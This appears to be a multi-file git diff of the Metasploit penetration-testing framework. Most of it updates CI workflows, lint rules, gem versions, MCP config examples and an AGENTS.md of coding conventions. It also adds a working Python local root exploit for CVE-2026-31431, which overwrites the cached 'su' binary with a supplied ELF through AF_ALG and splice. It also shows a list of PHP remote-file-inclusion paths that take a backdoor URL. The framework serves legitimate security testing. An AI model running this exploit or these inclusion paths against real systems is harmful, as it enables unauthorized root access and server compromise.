automatic module_metadata_base.json update

vim plugin persistence

.github/copilot-instructions.md

@@ -0,0 +1,3 @@
+# Copilot Instructions
+
+Refer to [AGENTS.md](../AGENTS.md) in the repository root for all project conventions, coding standards, and AI agent guidelines.

.github/workflows/shared_gem_verify_rails.yml

@@ -12,9 +12,37 @@ on:
         required: false
         default: "[]"
         type: string
+      additional_rails_versions:
+        description: 'Additional Rails version requirements as a JSON array (for example: ["~> 8.1.0"])'
+        required: false
+        default: "[]"
+        type: string
+        # Caller example:
+        # with:
+        #   additional_rails_versions: '["~> 8.1.0", "~> 8.2.0"]'
 
 jobs:
+  prepare_matrix:
+    runs-on: ubuntu-latest
+    outputs:
+      rails_versions: ${{ steps.merge_rails_versions.outputs.rails_versions }}
+    steps:
+      - name: Build Rails version matrix
+        id: merge_rails_versions
+        run: |
+          default_rails_versions='["~> 7.0.0","~> 7.1.0","~> 7.2.0"]'
+          additional_rails_versions='${{ inputs.additional_rails_versions }}'
+
+          rails_versions=$(jq -cn \
+            --argjson defaults "$default_rails_versions" \
+            --argjson extras "$additional_rails_versions" \
+            '$defaults + $extras | unique')
+
+          echo "rails_versions=$rails_versions" >> "$GITHUB_OUTPUT"
+        shell: bash
+
   test:
+    needs: prepare_matrix
     runs-on: ${{ matrix.os }}
     timeout-minutes: 40
 
@@ -25,18 +53,16 @@ jobs:
           - '3.2'
           - '3.3'
           - '3.4'
-        rails:
-          - '~> 7.0.0'
-          - '~> 7.1.0'
-          - '~> 7.2.0'
+        rails: ${{ fromJSON(needs.prepare_matrix.outputs.rails_versions) }}
         postgres:
-          - '9.6'
+          - '14.19'
           - '16.8'
         os:
           - ubuntu-latest
 
     env:
       RAILS_ENV: test
+      RAILS_VERSION: ${{ matrix.rails }}
 
     name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - Rails ${{ matrix.rails }} - PostgreSQL ${{ matrix.postgres }}
     steps:

.github/workflows/shared_meterpreter_acceptance.yml

@@ -284,21 +284,21 @@ jobs:
         run: |
           Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
           dir
-          $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
-          $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
-          $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
-          $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
-          if ($process.ExitCode -eq 0) {
-            Write-Host "components have been successfully added"
-          } else {
-            Write-Host "components were not installed"
-            exit 1
-          }
-          Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
-          $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
-          Write-Host $r
-          $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
-          Write-Host $r
+        # $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
+        # $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
+        # $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
+        # $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
+        # if ($process.ExitCode -eq 0) {
+        #   Write-Host "components have been successfully added"
+        # } else {
+        #   Write-Host "components were not installed"
+        #   exit 1
+        # }
+        # Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
+        # $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
+        # Write-Host $r
+        # $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
+        # Write-Host $r
         working-directory: metasploit-payloads
 
       - name: Build Windows payloads via Visual Studio 2025 Build (Windows)

.kiro/steering/project.md

@@ -0,0 +1,12 @@
+---
+inclusion: always
+---
+
+# Metasploit Framework — Kiro Steering
+
+Follow the project's AI agent instructions and coding conventions defined in the repository root.
+
+## References
+- AI agent instructions: #[[file:AGENTS.md]]
+- Contributing guide: #[[file:CONTRIBUTING.md]]
+- RuboCop config: #[[file:.rubocop.yml]]

.rubocop.yml

@@ -25,6 +25,8 @@ require:
   - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
   - ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb
   - ./lib/rubocop/cop/lint/detect_outdated_cmd_exec_api.rb
+  - ./lib/rubocop/cop/lint/datastore_srvhost_usage.rb
+  - ./lib/rubocop/cop/lint/bare_check_code_in_non_exploit.rb
 
 Layout/SpaceBeforeBrackets:
   Enabled: true
@@ -683,3 +685,14 @@ Lint/DetectOutdatedCmdExecApi:
     Detects outdated usage of cmd_exec with separate arguments.
     Use `create_process(executable, args: [], time_out: 15, opts: {})` API with an args array instead.
   Enabled: true
+
+Lint/BareCheckCodeInNonExploit:
+  Description: >-
+    Use Exploit::CheckCode instead of bare CheckCode in non-exploit modules.
+    Bare CheckCode will raise a NameError at runtime in auxiliary, post, and evasion modules
+    because CheckCode is defined inside Msf::Exploit which is not in their ancestor chain.
+  Enabled: true
+  Include:
+    - 'modules/auxiliary/**/*'
+    - 'modules/post/**/*'
+    - 'modules/evasion/**/*'

AGENTS.md

@@ -0,0 +1,122 @@
+# AI Agent Instructions for Metasploit Framework
+
+## Project Overview
+
+Metasploit Framework is an open-source penetration testing and exploitation framework written in Ruby. It provides infrastructure for developing, testing, and executing exploit code against remote targets.
+
+## Project Structure
+
+- `modules/` — Metasploit modules (exploits, auxiliary, post, payloads, encoders, evasion, nops)
+- `lib/msf/` — Core framework library code
+- `lib/rex/` — Rex (Ruby Exploitation) library
+- `lib/metasploit/` — Metasploit namespace libraries
+- `data/` — Data files used by modules (wordlists, templates, binaries)
+- `spec/` — RSpec test suite
+- `tools/` — Developer and operational tools
+- `plugins/` — msfconsole plugins
+- `scripts/` — Example automation scripts
+
+## Coding Conventions
+
+- Ruby (see `.ruby-version` for the current version). Minimum supported: 3.1+
+- Follow the project's `.rubocop.yml` configuration — run `rubocop` on changed files before submitting
+- Run `ruby tools/dev/msftidy.rb <module_file_path>` to catch common module issues
+- Add `# frozen_string_literal: true` to new files (the RuboCop cop is disabled project-wide for legacy code, but new files should include it)
+- No enforced line length limit, but keep code readable
+- Use `%q{}` for long multi-line strings (curly braces preferred for module descriptions)
+- Multiline block comments are acceptable for embedded code snippets/payloads
+- Don't use `get_`/`set_` prefixes for accessor methods in new code
+- Method parameter names must be at least 2 characters (exception for well-known crypto abbreviations)
+
+### Module Development
+
+- Prefer writing modules in Ruby. Go and Python modules are accepted, but their external runtimes don't support the full framework API (e.g. network pivoting). Ruby modules do not have this limitation
+- Prefer using hash over an array for return values, and use kwargs for reusable APIs for future extensions
+- Before writing a new module, check that there is not an existing module or open pull request that already covers the same functionality
+- Each module should be in its own file under the appropriate `modules/` subdirectory. In some scenarios adding module actions or targets is preferred.
+- Exploits require a `DisclosureDate` field
+- Exploits, auxiliary, and post modules require `Notes` with `SideEffects`
+- Use the module mixin APIs — don't reinvent the wheel
+- Use `create_process(executable, args: [], time_out: 15, opts: {})` instead of the deprecated `cmd_exec` with separate arguments
+- License new code with `MSF_LICENSE` (the project default, defined in `lib/msf/core/constants.rb`)
+- When overriding `cleanup`, always call `super` to ensure the parent mixin chain cleans up connections and sessions properly
+- When possible don't set a default payload (`DefaultOptions` with `'PAYLOAD'`) in modules — let the framework choose the most appropriate payload automatically
+- New modules require an associated markdown file in the `documentation/modules` folder with the same structure, including steps to set up the vulnerable environment for testing
+- Module descriptions or documentation should list the range of vulnerable versions and the fixed version of the affected software, when known
+- `report_service` method called when a service can be reported
+- `report_vuln` method called when a vuln can be reported
+- When creating a fake account / username use FAKER not `rand_test_alphanumeric`
+- Always use `res.get_json_document` to convert an HTTP response to a hash instead of calling `JSON.parse(res.body)`
+- If there's only one `ACTION` in the exploit, it can likely be omitted.
+- `Msf::Exploit::SQLi` should be used if it's exploiting an SQLi
+- All `print_*` calls should start with a capital
+- when opening a file, make sure the file exists first
+- when checking for a string in a response - will it always be in english?
+- Ensure hardcoded strings being regex'ed will be consistent across multiple versions
+- Use the TEST-NET-1 range for example / non-routeable IP addresses in unit tests and spec files: `192.0.2.0`. Local/private IPs are fine in module documentation scenarios.
+- Use fetch payload instead of command stagers when only options that request the stage are available (i.e. don’t use a cmd stager and only allow curl/wget).
+- Define bad characters instead of explicitly base-64 encoding payloads
+- Use `ARCH_CMD` payloads instead of command stagers when only curl/wget and other download mechanisms would be available
+- Don’t check the number of sessions at the end of an exploit and report success based on that, not all payloads open sessions
+- Don’t submit any kind of opaque binary blob, everything must include source code and build instructions
+- Don’t print host information like `#{ip}:#{port}` because it doesn’t handle IPv6 addresses, instead use `#{Rex::Socket.to_authority(ip, port)}`
+- Implement a `check` method when possible to allow users to verify vulnerability before exploitation
+
+### Check Methods
+
+- `check` methods must only return `CheckCode` values (e.g. `CheckCode::Vulnerable`, `CheckCode::Safe`) — never raise exceptions or call `fail_with`
+- When writing a `check` method, verify it does not produce false positives when run against unrelated software or services
+- Prefer using `Rex::Version` for version checks
+- Use `fail_with(Failure::UnexpectedReply, '...')` (and other `Failure::*` constants) to bail out of `exploit`/`run` methods — don't use `raise` or bare `return` for error conditions
+- `get_version` methods should return a REX version
+- `CheckCode::Vulnerable` is only used when the vulnerability has been exploited
+- `CheckCode::Appears`  is only used when the application's versions has been checked`
+- Use specific regular expressions or `res.get_html_document` for version extraction with CSS selectors. Don't use a generic selectors like `href .*` dot star to grab the version, be more precise.
+- Do catch exceptions that may be raised and ensure a valid Check Code is returned
+- Do research and determine a minimum version where the application is vulnerable, mark prior versions as safe
+- Check helper methods that are used by both `#check` and `#exploit` (or `#run`) and make sure there is no condition (exception, return, etc) where `#check` could return something else than CheckCode.
+- Prefer `prepend Msf::Exploit::Remote::AutoCheck` over manually calling `check` inside `exploit` — this lets the framework handle check-before-exploit automatically
+
+### Library Code
+
+- When adding complex binary or protocol parsing (e.g. BinData, RASN1, Rex::Struct2), include a code comment linking to the specification or RFC that defines the format being implemented
+- Write RSpec tests for any library changes
+- Follow [Better Specs](http://www.betterspecs.org/) conventions
+- Write YARD documentation for public methods
+- Keep PRs focused — small fixes are easier to review
+- Any new hash cracking implementations require adding a test hash to `tools/dev/hash_cracker_validator.rb` and ensuring that passes without error
+
+### Testing
+
+- Tests live in `spec/` mirroring the `lib/` structure
+- Run tests with: `bundle exec rspec spec/path/to/spec.rb`
+
+### Preferred Libraries
+
+- Use the `RubySMB` library for SMB modules
+- Use `Rex::Stopwatch.elapsed_time` to track elapsed time
+- Use the `Rex::MIME::Message` class for MIME messages instead of hardcoding XML
+- When creating random variable names prefer `Rex::RandomIdentifier::Generator` and specify the runtime language used. This avoids generating langauge keywords that would break the script.
+
+## Common Patterns
+
+- Register options with `register_options` and `register_advanced_options`
+- Use `SCREAMING_SNAKE_CASE` option names and `CamelCase` advanced option names
+- Use `datastore['OPTION_NAME']` to access module options
+- Use `print_status`, `print_good`, `print_error`, `print_warning` for console output
+- Use `vprint_*` variants for verbose-only output
+- Use `send_request_cgi` for HTTP requests in modules
+- Use `connect` / `disconnect` for TCP socket operations
+
+## Before Submitting
+
+- Ensure `rubocop` and `msftidy` pass on any changed files with no new offenses
+- Ensure `ruby tools/dev/msftidy_docs.rb <documentation_file>` passes on any changed documentation markdown docs with no new offenses
+
+## What NOT to Do
+
+- Don't submit untested code — all code must be manually verified
+- Don't include sensitive information (IPs, credentials, API keys, hashes of credentials) in code or docs
+- Don't include more than one module per pull request
+- Don't add new scripts to `scripts/` — use post modules instead
+- Don't use `pack`/`unpack` with invalid directives (enforced by linter)

CONTRIBUTING.md

@@ -15,7 +15,7 @@ Before we get into the details of contributing code, you should know there are m
 
 
 ## Code Contributions
-For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. For a detailed reference of our coding conventions, project structure, and preferred patterns, see [AGENTS.md](./AGENTS.md). Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.
 
 Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
 

Gemfile

@@ -53,5 +53,6 @@ group :test do
   gem 'allure-rspec'
   # Manipulate Time.now in specs
   gem 'timecop'
+  # stub and set expectations on HTTP requests
+  gem 'webmock', '~> 3.18'
 end
-

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (6.4.124)
+    metasploit-framework (6.4.133)
       aarch64
       abbrev
       actionpack (~> 7.2.0)
@@ -42,11 +42,12 @@ PATH
       jsobfu
       json
       lru_redux
+      mcp (= 0.13.0)
       metasm
       metasploit-concern
-      metasploit-credential
+      metasploit-credential (>= 6.0.21)
       metasploit-model
-      metasploit-payloads (= 2.0.242)
+      metasploit-payloads (= 2.0.245)
       metasploit_data_models (>= 6.0.15)
       metasploit_payloads-mettle (= 1.0.46)
       mqtt
@@ -211,7 +212,7 @@ GEM
     bcrypt (3.1.20)
     bcrypt_pbkdf (1.1.1)
     benchmark (0.4.1)
-    bigdecimal (3.2.3)
+    bigdecimal (3.3.1)
     bindata (2.4.15)
     bootsnap (1.18.4)
       msgpack (~> 1.2)
@@ -223,6 +224,9 @@ GEM
     concurrent-ruby (1.3.5)
     connection_pool (2.5.4)
     cookiejar (0.3.4)
+    crack (1.0.1)
+      bigdecimal
+      rexml
     crass (1.0.6)
     csv (3.3.2)
     daemons (1.4.1)
@@ -281,6 +285,7 @@ GEM
     gyoku (1.4.0)
       builder (>= 2.1.2)
       rexml (~> 3.0)
+    hashdiff (1.2.1)
     hashery (2.1.2)
     hrr_rb_ssh (0.4.2)
     hrr_rb_ssh-ed25519 (0.4.2)
@@ -304,6 +309,9 @@ GEM
     jsobfu (0.4.2)
       rkelly-remix
     json (2.15.1)
+    json-schema (6.2.0)
+      addressable (~> 2.8)
+      bigdecimal (>= 3.1, < 5)
     language_server-protocol (3.17.0.5)
     license_finder (5.11.1)
       bundler
@@ -322,6 +330,8 @@ GEM
       crass (~> 1.0.2)
       nokogiri (>= 1.12.0)
     lru_redux (1.1.0)
+    mcp (0.13.0)
+      json-schema (>= 4.1)
     memory_profiler (1.1.0)
     metasm (1.0.5)
     metasploit-concern (5.0.5)
@@ -331,7 +341,7 @@ GEM
       mutex_m
       railties (~> 7.0)
       zeitwerk
-    metasploit-credential (6.0.20)
+    metasploit-credential (6.0.23)
       bigdecimal
       csv
       drb
@@ -352,18 +362,18 @@ GEM
       drb
       mutex_m
       railties (~> 7.0)
-    metasploit-payloads (2.0.242)
-    metasploit_data_models (6.0.15)
-      activerecord (~> 7.0)
-      activesupport (~> 7.0)
+    metasploit-payloads (2.0.245)
+    metasploit_data_models (6.0.18)
+      activerecord (>= 7.0, < 8.1)
+      activesupport (>= 7.0, < 8.1)
       arel-helpers
       bigdecimal
       drb
       metasploit-concern
-      metasploit-model (~> 5.0.4)
+      metasploit-model (>= 5.0.4)
       mutex_m
       pg
-      railties (~> 7.0)
+      railties (>= 7.0, < 8.1)
       recog
       webrick
     metasploit_payloads-mettle (1.0.46)
@@ -489,16 +499,16 @@ GEM
       http-cookie (>= 1.0.2, < 2.0)
       mime-types (>= 1.16, < 4.0)
       netrc (~> 0.8)
-    rex-arch (0.1.19)
+    rex-arch (0.1.20)
       rex-text
-    rex-bin_tools (0.1.10)
+    rex-bin_tools (0.1.16)
       metasm
       rex-arch
       rex-core
       rex-struct2
       rex-text
-    rex-core (0.1.35)
-    rex-encoder (0.1.8)
+    rex-core (0.1.36)
+    rex-encoder (0.1.10)
       metasm
       rex-arch
       rex-text
@@ -531,7 +541,7 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.64)
+    rex-socket (0.1.65)
       dnsruby
       rex-core
     rex-sslscan (0.1.13)
@@ -539,7 +549,7 @@ GEM
       rex-socket
       rex-text
     rex-struct2 (0.1.5)
-    rex-text (0.2.61)
+    rex-text (0.2.63)
       bigdecimal
     rex-zip (0.1.6)
       rex-text
@@ -649,6 +659,10 @@ GEM
     useragent (0.16.11)
     warden (1.2.9)
       rack (>= 2.0.9)
+    webmock (3.26.2)
+      addressable (>= 2.8.0)
+      crack (>= 0.3.2)
+      hashdiff (>= 0.4.0, < 2.0.0)
     webrick (1.9.1)
     websocket-driver (0.7.7)
       base64
@@ -699,6 +713,7 @@ DEPENDENCIES
   simplecov (= 0.18.2)
   test-prof
   timecop
+  webmock (~> 3.18)
   yard
 
 BUNDLED WITH

LICENSE_GEMS

@@ -27,7 +27,7 @@ base64, 0.3.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
 bcrypt_pbkdf, 1.1.1, MIT
 benchmark, 0.4.1, "ruby, Simplified BSD"
-bigdecimal, 3.2.3, "ruby, Simplified BSD"
+bigdecimal, 3.3.1, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
 bootsnap, 1.18.4, MIT
 bson, 5.1.1, "Apache 2.0"
@@ -39,6 +39,7 @@ coderay, 1.1.3, MIT
 concurrent-ruby, 1.3.5, MIT
 connection_pool, 2.5.4, MIT
 cookiejar, 0.3.4, "Simplified BSD"
+crack, 1.0.1, MIT
 crass, 1.0.6, MIT
 csv, 3.3.2, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
@@ -71,6 +72,7 @@ forwardable, 1.3.3, "ruby, Simplified BSD"
 getoptlong, 0.2.1, "ruby, Simplified BSD"
 gssapi, 1.3.1, MIT
 gyoku, 1.4.0, MIT
+hashdiff, 1.2.1, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
@@ -85,6 +87,7 @@ irb, 1.15.2, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.15.1, ruby
+json-schema, 6.2.0, MIT
 language_server-protocol, 3.17.0.5, MIT
 license_finder, 5.11.1, MIT
 lint_roller, 1.1.0, MIT
@@ -93,14 +96,15 @@ logger, 1.7.0, "ruby, Simplified BSD"
 logging, 2.4.0, MIT
 loofah, 2.24.1, MIT
 lru_redux, 1.1.0, MIT
+mcp, 0.13.0, "Apache 2.0"
 memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.5, "New BSD"
-metasploit-credential, 6.0.20, "New BSD"
-metasploit-framework, 6.4.124, "New BSD"
+metasploit-credential, 6.0.23, "New BSD"
+metasploit-framework, 6.4.133, "New BSD"
 metasploit-model, 5.0.4, "New BSD"
-metasploit-payloads, 2.0.242, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 6.0.15, "New BSD"
+metasploit-payloads, 2.0.245, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 6.0.18, "New BSD"
 metasploit_payloads-mettle, 1.0.46, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
 mime-types, 3.7.0, MIT
@@ -166,10 +170,10 @@ regexp_parser, 2.11.3, MIT
 reline, 0.6.2, ruby
 require_all, 3.0.0, MIT
 rest-client, 2.1.0, MIT
-rex-arch, 0.1.19, "New BSD"
-rex-bin_tools, 0.1.10, "New BSD"
-rex-core, 0.1.35, "New BSD"
-rex-encoder, 0.1.8, "New BSD"
+rex-arch, 0.1.20, "New BSD"
+rex-bin_tools, 0.1.16, "New BSD"
+rex-core, 0.1.36, "New BSD"
+rex-encoder, 0.1.10, "New BSD"
 rex-exploitation, 0.1.44, "New BSD"
 rex-java, 0.1.8, "New BSD"
 rex-mime, 0.1.11, "New BSD"
@@ -179,10 +183,10 @@ rex-powershell, 0.1.103, "New BSD"
 rex-random_identifier, 0.1.21, "New BSD"
 rex-registry, 0.1.6, "New BSD"
 rex-rop_builder, 0.1.6, "New BSD"
-rex-socket, 0.1.64, "New BSD"
+rex-socket, 0.1.65, "New BSD"
 rex-sslscan, 0.1.13, "New BSD"
 rex-struct2, 0.1.5, "New BSD"
-rex-text, 0.2.61, "New BSD"
+rex-text, 0.2.63, "New BSD"
 rex-zip, 0.1.6, "New BSD"
 rexml, 3.4.1, "Simplified BSD"
 rinda, 0.2.0, "ruby, Simplified BSD"
@@ -202,7 +206,7 @@ ruby-prof, 1.7.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.15, "New BSD"
+ruby_smb, 3.3.17, "New BSD"
 rubyntlm, 0.6.5, MIT
 rubyzip, 2.4.1, "Simplified BSD"
 sawyer, 0.9.2, MIT
@@ -233,6 +237,7 @@ unicode-emoji, 4.1.0, MIT
 unix-crypt, 1.3.1, 0BSD
 useragent, 0.16.11, MIT
 warden, 1.2.9, MIT
+webmock, 3.26.2, MIT
 webrick, 1.9.1, "ruby, Simplified BSD"
 websocket-driver, 0.7.7, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"

config/mcp_config.yaml.example

@@ -0,0 +1,33 @@
+# Metasploit RPC API connection (MessagePack)
+msf_api:
+  type: messagepack
+  host: localhost
+  port: 55553
+  ssl: true
+  endpoint: /api/
+  user: msfuser
+  password: CHANGEME
+  auto_start_rpc: true  # Automatically start the RPC server if not running (default: true)
+
+# MCP server configuration
+mcp:
+  transport: stdio  # stdio (default) or http
+  # MCP server network configuration (for HTTP transport only)
+  host: localhost  # Host to bind to (default: localhost)
+  port: 3000       # Port to listen on (default: 3000)
+
+# Rate limiting (optional - defaults shown)
+rate_limit:
+  enabled: true
+  requests_per_minute: 60
+  # If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
+  # For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
+  # but then would be limited to 5 requests per minute thereafter.
+  burst_size: 10
+
+# Logging (optional - defaults shown)
+logging:
+  enabled: false
+  level: INFO  # DEBUG, INFO, WARN, ERROR
+  log_file: ~/.msf4/logs/msfmcp.log
+  sanitize: true

config/mcp_config_jsonrpc.yaml.example

@@ -0,0 +1,32 @@
+# Metasploit RPC API connection (JSON-RPC)
+msf_api:
+  type: json-rpc
+  host: localhost
+  port: 8081
+  ssl: true
+  endpoint: /api/v1/json-rpc
+  token: YOUR_BEARER_TOKEN_HERE
+  # auto_start_rpc is not supported for JSON-RPC (only MessagePack)
+
+# MCP server configuration
+mcp:
+  transport: stdio  # stdio (default) or http
+  # MCP server network configuration (for HTTP transport only)
+  host: localhost  # Host to bind to (default: localhost)
+  port: 3000       # Port to listen on (default: 3000)
+
+# Rate limiting (optional - defaults shown)
+rate_limit:
+  enabled: true
+  requests_per_minute: 60
+  # If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
+  # For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
+  # but then would be limited to 5 requests per minute thereafter.
+  burst_size: 10
+
+# Logging (optional - defaults shown)
+logging:
+  enabled: false
+  level: INFO  # DEBUG, INFO, WARN, ERROR
+  log_file: ~/.msf4/logs/msfmcp.log
+  sanitize: true

data/exploits/CVE-2026-31431/CVE-2026-31431-check.py

@@ -0,0 +1,33 @@
+#!/usr/bin/env python3
+import os
+import socket
+import sys
+
+AF_ALG = 38
+ALG_NAME = "authencesn(hmac(sha256),cbc(aes))"
+
+def check():
+    if not os.path.exists('/proc/crypto'):
+        print('[-] /proc/crypto is missing.')
+        return
+
+    try:
+        s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
+    except OSError as e:
+        print('[-] AF_ALG socket family unavailable (' + e.strerror + ').')
+        return
+
+    try:
+        s.bind(("aead", ALG_NAME))
+    except OSError as e:
+        print('[-] ' + repr(ALG_NAME) + ' can not be instantiated (' + e.strerror + ').')
+        return
+    finally:
+        s.close()
+
+    print('[+] The exploit socket has been created, encryption primitives are available.')
+    return True
+
+if __name__ == '__main__':
+    if not check():
+        sys.exit(1)

data/exploits/CVE-2026-31431/CVE-2026-31431-cleanup.py

@@ -0,0 +1,9 @@
+import os
+import shutil
+
+su_path = shutil.which('su')
+su_fd = os.open(su_path, os.O_RDONLY)
+try:
+    os.posix_fadvise(su_fd, 0, 0, os.POSIX_FADV_DONTNEED)
+finally:
+    os.close(su_fd)

data/exploits/CVE-2026-31431/CVE-2026-31431.py

@@ -0,0 +1,56 @@
+#!/usr/bin/env python3
+import os
+import base64
+import shutil
+import socket
+import sys
+import zlib
+
+AF_ALG = 38
+ALG_SET_KEY = 1
+ALG_SET_IV = 2
+ALG_SET_OP = 3
+ALG_SET_AEAD_ASSOCLEN = 4
+ALG_SET_AEAD_AUTHSIZE = 5
+SOL_ALG = 279
+
+def setup_sock():
+    sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
+    sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
+    sock.setsockopt(SOL_ALG, ALG_SET_KEY, bytes.fromhex("0800010000000010" + "0" * 64))
+    sock.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
+    op_sock, _ = sock.accept()
+    return op_sock
+
+def write(op_sock, su_fd, offset, chunk):
+    op_sock.sendmsg(
+        [b"A" * 4 + chunk],
+        [
+            (SOL_ALG, ALG_SET_OP, b'\x00\x00\x00\x00'),
+            (SOL_ALG, ALG_SET_IV, b'\x10' + b'\x00' * 19),
+            (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, b'\x08\x00\x00\x00')
+        ],
+        32768
+    )
+    r, w = os.pipe()
+    os.splice(su_fd, w, offset + 4, offset_src=0)
+    os.splice(r, op_sock.fileno(), offset + 4)
+    try:
+        op_sock.recv(8 + offset)
+    except:
+        pass
+
+su_path = shutil.which('su')
+su_fd = os.open(su_path, os.O_RDONLY)
+try:
+    elf = zlib.decompress(base64.standard_b64decode(sys.argv[1]))
+except:
+    print('[-] failed to load the ELF executable from the argument, it must be base64+gzip')
+    sys.exit(os.EX_USAGE)
+
+op_sock = setup_sock()
+for i in range(0, len(elf), 4):
+    write(op_sock, su_fd, i, elf[i:i + 4])
+op_sock.close()
+
+os.execvp(su_path, ["su"] + sys.argv[1:])

data/exploits/php/rfi-locations.dat

@@ -1,2246 +1,2247 @@
-# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
-# Change XXpathXX to the path of your backdoor.  Note that you may need to 
-# try it against every directory on the target and because of how this was
-# culled you may need to add a question mark to your own XXpathXX URL:
-# Eg: XXpathXX => http://www.example.com/hax.txt?
-/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
-/123flashchat.php?e107path=XXpathXX
-/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX
-/22_ultimate/templates/header.php?mainpath=XXpathXX
-/22_ultimate/templates/header.php?mainpath=XXpathXX?
-/=XXpathXX
-/?_CONFIG[files][functions_page]=XXpathXX
-/?npage=-1&content_dir=XXpathXX%00&cmd=ls
-/?npage=1&content_dir=XXpathXX%00&cmd=ls
-/?show=XXpathXX?
-/A-Blog/navigation/donation.php?navigation_start=XXpathXX
-/A-Blog/navigation/latestnews.php?navigation_start=XXpathXX?
-/A-Blog/navigation/links.php?navigation_start=XXpathXX?
-/A-Blog/navigation/search.php?navigation_end=XXpathXX?
-/A-Blog/sources/myaccount.php?open_box=XXpathXX?
-/ACGVnews/header.php?PathNews=XXpathXX
-/ATutor/documentation/common/frame_toc.php?section=XXpathXX
-/ATutor/documentation/common/search.php?section=XXpathXX
-/ATutor/documentation/common/vitals.inc.php?req_lang=XXpathXX
-/ATutor/include/classes/module/module.class.php?row[dir_name]=XXpathXX
-/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=XXpathXX
-/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=XXpathXX?
-/Administration/Includes/configureText.php?path_prefix=XXpathXX
-/Administration/Includes/contentHome.php?path_prefix=XXpathXX
